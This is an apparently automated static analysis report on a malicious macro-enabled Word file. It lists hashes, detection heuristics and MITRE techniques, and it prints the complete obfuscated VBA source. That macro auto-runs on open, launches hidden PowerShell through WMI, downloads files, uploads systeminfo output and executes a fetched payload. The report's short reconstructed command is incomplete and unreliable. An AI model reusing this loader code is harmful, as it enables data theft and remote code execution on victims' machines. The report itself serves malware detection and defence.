Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e63c618930e51662…

MALICIOUS

Office (OOXML)

35.2 KB Created: 2021-03-29 23:38:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-23
MD5: fc051a7af1e7dbc73620d5201d2a516f SHA-1: 9892c7392a8f26ba7e9afcfd763db2d928b79db6 SHA-256: e63c618930e51662897b4daffae924217ad197e5937dd5dfbe54ef6f8ef9cb4a
210 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a malicious OOXML document containing obfuscated VBA macros. The Document_Open macro executes an auto-exec loader that uses CreateObject to launch PowerShell. The reconstructed PowerShell command is 'powershell -nop -w hidden -c "$env:USERPROFILE/Documents/file.exe"', indicating it downloads and executes a second-stage payload from a remote source. This is a common technique for initial access via spearphishing attachments.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Public Sub Main()
    Set FRysWnMxHe = CreateObject(WyfazEQPUs() + AvocFLLYWi())
    FRysWnMxHe.ShowWindow! = 1
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Sub Main()
    Set FRysWnMxHe = CreateObject(WyfazEQPUs() + AvocFLLYWi())
    FRysWnMxHe.ShowWindow! = 1
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Public Sub Document_Open()
    Main
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9900 bytes
SHA-256: cd957b31130363fb229c2686b09e742af415e3402586c787c2cc2702f174572f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
87 of 137 identifiers look randomly generated (e.g. 'AgmleRGLDd'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
    Main
End Sub
Public Sub Main()
    Set FRysWnMxHe = CreateObject(WyfazEQPUs() + AvocFLLYWi())
    FRysWnMxHe.ShowWindow! = 1
    oNNTfllotP = CreateObject(WyfazEQPUs()).Create(BzWxNFgaWy(), iuYTMLNKAQ(), FRysWnMxHe, iuYTMLNKAQ())
End Sub
Public Function BzWxNFgaWy()
    BzWxNFgaWy = BZVEZYvaeC() + RFROqiGAsy() + SYwaxQFdFn() + bsTtNsIrSt() + YfyvpxtdsH() + qwaHVenBFw() + OcLhfgnwLp()
End Function
Public Function BZVEZYvaeC()
    BZVEZYvaeC = WToZzcWjaR() + "ell $" + RmMaNSZHRY() + PDwWygobun() + "/file.e"
End Function
Public Function WToZzcWjaR()
    WToZzcWjaR = "pow" + "ersh"
End Function
Public Function EgqHMQXLXT()
    EgqHMQXLXT = "Web" + "C =&"
End Function
Public Function yJzrmUuOUO()
    yJzrmUuOUO = EgqHMQXLXT() + "('ne" + "w-object"
End Function
Public Function RmMaNSZHRY()
    RmMaNSZHRY = yJzrmUuOUO() + "')Ne" + "t.webc"
End Function
Public Function JSTqCgSmtO()
    JSTqCgSmtO = "lient;$"
End Function
Public Function ZycNPEiNOj()
    ZycNPEiNOj = "vari = $e" + "nv:use"
End Function
Public Function qKfOiYgaom()
    qKfOiYgaom = "rprofile" + "+'/Doc"
End Function
Public Function xDNwWKIGGu()
    xDNwWKIGGu = "uments"
End Function
Public Function PDwWygobun()
    PDwWygobun = JSTqCgSmtO() + ZycNPEiNOj() + qKfOiYgaom() + xDNwWKIGGu()
End Function
Public Function RFROqiGAsy()
    RFROqiGAsy = gpxyyVPtSL() + mnhJKgQGbs() + rFHhTkoMJj() + wVqSrHSzoS()
End Function
Public Function AtTBRJlRjG()
    AtTBRJlRjG = "xe'" + ";$va"
End Function
Public Function kAVuEdkaPM()
    kAVuEdkaPM = "ri2 =" + " $env:u"
End Function
Public Function gpxyyVPtSL()
    gpxyyVPtSL = AtTBRJlRjG() + kAVuEdkaPM() + "serprof"
End Function
Public Function IdGAJyLWDE()
    IdGAJyLWDE = "ile+'/D" + "ocumen"
End Function
Public Function RrqHqOQeRb()
    RrqHqOQeRb = "p.txt';" + "$Web"
End Function
Public Function rFHhTkoMJj()
    rFHhTkoMJj = RrqHqOQeRb() + "C.Downl"
End Function
Public Function mnhJKgQGbs()
    mnhJKgQGbs = IdGAJyLWDE() + "ts/tem"
End Function
Public Function etgtvQwEqc()
    etgtvQwEqc = "oadfil" + "e('htt"
End Function
Public Function hDnrbuEDmR()
    hDnrbuEDmR = etgtvQwEqc() + "p://loc" + "alhos"
End Function
Public Function kINgnijAQp()
    kINgnijAQp = "t/sys" + "info.t" + "xt',$va"
End Function
Public Function wVqSrHSzoS()
    wVqSrHSzoS = hDnrbuEDmR() + kINgnijAQp()
End Function
Public Function SYwaxQFdFn()
    SYwaxQFdFn = mPxXsCkmGj()
End Function
Public Function vONfHOaScx()
    vONfHOaScx = "ri2" + ");$syst"
End Function
Public Function AgmleRGLDd()
    AgmleRGLDd = "eminf"
End Function
Public Function dbgWgYOjTa()
    dbgWgYOjTa = vONfHOaScx() + AgmleRGLDd() + "o = Inv"
End Function
Public Function wczbmRiQfP()
    wczbmRiQfP = "oke-Ex" + "pressi"
End Function
Public Function yGoVXqAYfG()
    yGoVXqAYfG = "on (get" + "-cont"
End Function
Public Function sBgzzaxbLc()
    sBgzzaxbLc = "ent -pa" + "th $va"
End Function
Public Function buYbxSpqLG()
    buYbxSpqLG = wczbmRiQfP() + yGoVXqAYfG() + sBgzzaxbLc()
End Function
Public Function BrIzDBaMOn()
    BrIzDBaMOn = "ri2);$W" + "ebC.Dow"
End Function
Public Function GUNsruLeHe()
    GUNsruLeHe = "nloadf" + "ile('h" + "ttp://l"
End Function
Public Function HfNTScWRKD()
    HfNTScWRKD = BrIzDBaMOn() + GUNsruLeHe()
End Function
Public Function ecmoPYfTob()
    ecmoPYfTob = "ocalho"
End Function
Public Function ofxrzvAzaO()
    ofxrzvAzaO = ecmoPYfTob() + "st/pa"
End Function
Public Function SePnXglLDb()
    SePnXglLDb = ofxrzvAzaO() + "yl"
End Function
Public Function mPxXsCkmGj()
    mPxXsCkmGj = dbgWgYOjTa() + buYbxSpqLG() + HfNTScWRKD() + SePnXglLDb()
End Function
Public Function bsTtNsIrSt()
    bsTtNsIrSt = YCzjhvvXft() + LgBXXkoNHQ() + UNMlLEeQIp()
End Function
Public Function lDyXSespeg()
    lDyXSespeg = "oad" + "s.txt'"
End Function
Public Function CrRrRIDTEh()
    CrRrRIDTEh = lDyXSespeg() + ",$va" + "ri2)"
End Function
Public Function fCyjEXrJwJ()
    fCyjEXrJwJ = ";$pat" + "h = ((g"
End Function
Public Function XdqiwcRqjp()
    XdqiwcRqjp = fCyjEXrJwJ() + "et-con" + "tent -p"
End Function
Public Function YCzjhvvXft()
    YCzjhvvXft = CrRrRIDTEh() + XdqiwcRqjp()
End Function
Public Function FpcsZYjiXB()
    FpcsZYjiXB = "ath $va" + "ri2 | W"
End Function
Public Function KilWWhpCbh()
    KilWWhpCbh = "here-Ob" + "ject {"
End Function
Public Function jXyYUikpzC()
    jXyYUikpzC = FpcsZYjiXB() + KilWWhpCbh()
End Function
Public Function yrHleuKqIV()
    yrHleuKqIV = jXyYUikpzC() + "$_ -li" + "ke ($s"
End Function
Public Function LgBXXkoNHQ()
    LgBXXkoNHQ = yrHleuKqIV() + "ystemi" + "nfo + '"
End Function
Public Function cWBtIRhBRn()
    cWBtIRhBRn = "*')}) "
End Function
Public Function mByJMkIgXf()
    mByJMkIgXf = "-spl"
End Function
Public Function UNMlLEeQIp()
    UNMlLEeQIp = cWBtIRhBRn() + mByJMkIgXf()
End Function
Public Function YfyvpxtdsH()
    YfyvpxtdsH = UPwTrYZtjQ() + VLzKzqMYMC() + VgHZvaWgYl() + woXQQfZWml()
End Function
Public Function ozlPulKlbd()
    ozlPulKlbd = "it '#'" + ")[1"
End Function
Public Function dJctTdjcRI()
    dJctTdjcRI = ozlPulKlbd() + "];$We"
End Function
Public Function VoCnvojTEW()
    VoCnvojTEW = "bC.D" + "ownlo"
End Function
Public Function QkBJwBnRmB()
    QkBJwBnRmB = "adfi"
End Function
Public Function gofYscfDGs()
    gofYscfDGs = "ttp:" + "//lo"
End Function
Public Function LRbNpRxkPq()
    LRbNpRxkPq = "le('h" + gofYscfDGs()
End Function
Public Function UPwTrYZtjQ()
    UPwTrYZtjQ = dJctTdjcRI() + VoCnvojTEW() + QkBJwBnRmB() + LRbNpRxkPq()
End Function
Public Function XcMAhuUnqE()
    XcMAhuUnqE = "calho" + "st/' "
End Function
Public Function ZzwoVomjKC()
    ZzwoVomjKC = "+ $pa" + "th,$"
End Function
Public Function VLzKzqMYMC()
    VLzKzqMYMC = XcMAhuUnqE() + ZzwoVomjKC() + "vari)"
End Function
Public Function tAEiRDgTtD()
    tAEiRDgTtD = ";New-" + "Ite"
End Function
Public Function RtLWyjnfyk()
    RtLWyjnfyk = tAEiRDgTtD() + "m ($e" + "nv:us"
End Function
Public Function VgHZvaWgYl()
    VgHZvaWgYl = tAEiRDgTtD() + "m ($e" + "nv:us"
End Function
Public Function wFCmXQJgJS()
    wFCmXQJgJS = "file "
End Function
Public Function OxIvDANHwe()
    OxIvDANHwe = "+ '\t"
End Function
Public Function APARMJdHyl()
    APARMJdHyl = "est"
End Function
Public Function VvYINWPlRE()
    VvYINWPlRE = ".txt'"
End Function
Public Function woXQQfZWml()
    woXQQfZWml = wFCmXQJgJS() + OxIvDANHwe() + APARMJdHyl() + VvYINWPlRE()
End Function
Public Function qwaHVenBFw()
    qwaHVenBFw = LsrCfNKpcp() + jasbhhEAMJ() + RAPcgnpoxD()
End Function
Public Function ToCRHhlJEE()
    ToCRHhlJEE = ");Se"
End Function
Public Function BYIXvautgO()
    BYIXvautgO = "t-Co"
End Function
Public Function YbeVHHOvII()
    YbeVHHOvII = "nten"
End Function
Public Function BApTGbYXTr()
    BApTGbYXTr = "t ($en"
End Function
Public Function CtRZAsIVcp()
    CtRZAsIVcp = YbeVHHOvII() + BApTGbYXTr()
End Function
Public Function tzpvzrhyZN()
    tzpvzrhyZN = "v:use"
End Function
Public Function nnbnHvoCrB()
    nnbnHvoCrB = "rpro" + "fil"
End Function
Public Function HomMaSeDNk()
    HomMaSeDNk = "e + '\" + "test.t"
End Function
Public Function FSfwGGmGwL()
    FSfwGGmGwL = tzpvzrhyZN() + nnbnHvoCrB() + HomMaSeDNk() + "xt') $s"
End Function
Public Function LsrCfNKpcp()
    LsrCfNKpcp = ToCRHhlJEE() + BYIXvautgO() + CtRZAsIVcp() + FSfwGGmGwL() + "yste"
End Function
Public Function bMATjgZivm()
    bMATjgZivm = "minfo;$W"
End Function
Public Function xIVkWGlfbn()
    xIVkWGlfbn = bMATjgZivm() + "ebC.U" + "ploa"
End Function
Public Function VCBOGABHPM()
    VCBOGABHPM = "dfil" + "e('ht"
End Function
Public Function OeRADPrrjX()
    OeRADPrrjX = VCBOGABHPM() + "tp:/" + "/loc"
End Function
Public Function jasbhhEAMJ()
    jasbhhEAMJ = xIVkWGlfbn() + OeRADPrrjX()
End Function
Public Function ILgGOtNjwt()
    ILgGOtNjwt = "alho" + "st/t"
End Function
Public Function RytRxkonJV()
    RytRxkonJV = "est.t" + "xt',("
End Function
Public Function RAPcgnpoxD()
    RAPcgnpoxD = ILgGOtNjwt() + RytRxkonJV() + "$e"
End Function

Public Function OcLhfgnwLp()
    OcLhfgnwLp = TfPnBgUZrL() + KzayZlXNRV()
End Function
Public Function TfPnBgUZrL()
    TfPnBgUZrL = "nv:use" + "rprof" + "ile + '\te"
    HvpuHezaKJ = ";[Diagno"
    TfPnBgUZrL = TfPnBgUZrL + "st.txt'))" + HvpuHezaKJ
End Function
Public Function KzayZlXNRV()
    KzayZlXNRV = "stics.Pro" + "cess]:"
    FZIQlMvTCz = "ari);"
    KzayZlXNRV = KzayZlXNRV + ":Sta" + "rt($v" + FZIQlMvTCz
End Function
Public Function WyfazEQPUs()
    WyfazEQPUs = arVnHugYyx() + uoKadlUGIS() + EwjULORcHb() + vLAcsSwYzJ() + mdpEwFcsmq() + gOWJqRYRDU()
End Function
Public Function arVnHugYyx()
    arVnHugYyx = "win"
End Function
Public Function uoKadlUGIS()
    uoKadlUGIS = "mgm"
End Function
Public Function EwjULORcHb()
    EwjULORcHb = "ts:W"
End Function
Public Function vLAcsSwYzJ()
    vLAcsSwYzJ = "in32"
End Function
Public Function mdpEwFcsmq()
    mdpEwFcsmq = "_Pro"
End Function
Public Function gOWJqRYRDU()
    gOWJqRYRDU = "cess"
End Function
Public Function AvocFLLYWi()
    AvocFLLYWi = bKTetgFGAo() + WsAKdYaXhm() + eawMByjuSN()
End Function
Public Function bKTetgFGAo()
    bKTetgFGAo = "Sta"
End Function
Public Function WsAKdYaXhm()
    WsAKdYaXhm = "rt"
End Function
Public Function eawMByjuSN()
    eawMByjuSN = "up"
End Function
Public Function iuYTMLNKAQ()
    iuYTMLNKAQ = Null
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 99840 bytes
SHA-256: bce2418ec398f0f441ba8c078f166f760bc285a0210f4ca9eb6067fb4d241fd9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
460 of 696 identifiers look randomly generated (e.g. 'xdRc4d52p55TPeeUFPNg4sB7XVgxvqu6Kn2zr') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.